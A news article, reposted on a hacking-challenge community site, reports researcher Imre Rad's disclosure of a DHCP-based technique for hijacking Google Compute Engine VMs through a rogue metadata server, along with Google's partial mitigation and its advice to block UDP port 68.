Donate to us via Paypal!
It is the path of least resistance that makes rivers and men crooked. - Bj Palmer
Sunday, August 01, 2021
Navigation
Home
 Find:
 Information:
Learn
Communicate
Submit
Shop
Challenges
 Exploit:
 Programming:
 Think:
 Track:
 Patch:
 Other:
 Need Help?
Other
Members Online
Total Online: 179
Guests Online: 179
Members Online: 0

Registered Members: 141563
Newest Member: viasil
Latest Articles

Google Cloud VMs vulnerable to hijack

An attacker could gain root access to VMs running on Google Cloud

Cybersecurity researcher Imre Rad has disclosed a potential vulnerability that can be exploited to get root access to virtual machines (VM) running on Google Cloud.

Specifically, the attack exploits a weakness in Google Compute Engine (GCE), which is Google Clouds Infrastructure-as-a-Service (IaaS) product.

Rad explains that attackers can take over GCE VMs by taking advantage of a weakness in the random number generator of the ISC DHCP server they use by default, together with an unfortunate combination of additional factors.

The hijacking is done by impersonating the metadata server from the targeted virtual machines point of view. By mounting this exploit, the attacker can grant access to themselves over SSH (public key authentication) so then they can login as the root user.

In his writeup, Rad explains that the attack consists of two phases. The first involves overloading a victims VM with DHCP traffic in order to get it to use a malicious attacker controlled metadata server instead of an official Google one.

Once the victims VM is listening to the rogue metadata server for configuration information, the attacker can send across their SSH public key and gain root access to the VM.

Rad says his technique is inspired by an attack vector shared last by Chris Moberly, another security researcher.

He reported the vulnerability to Google in September 2020, but has not heard back since. He suspects that, since Google has not closed his bug report, there could be some technical complexity that prevents them from deploying a network level remediation.

Update:

Google now says it has taken steps to prevent the exploitation of the vulnerability through either the internet or external VM IP traffic, although a complete mitigation has not yet been deployed.

According to Google, customers with untrusted internal traffic would be wise to ensure the incoming UDP port 68 is blocked by firewalls to head off malicious activity.

Posted by rex_mundi
Source : Unknown
Thursday 01 July 2021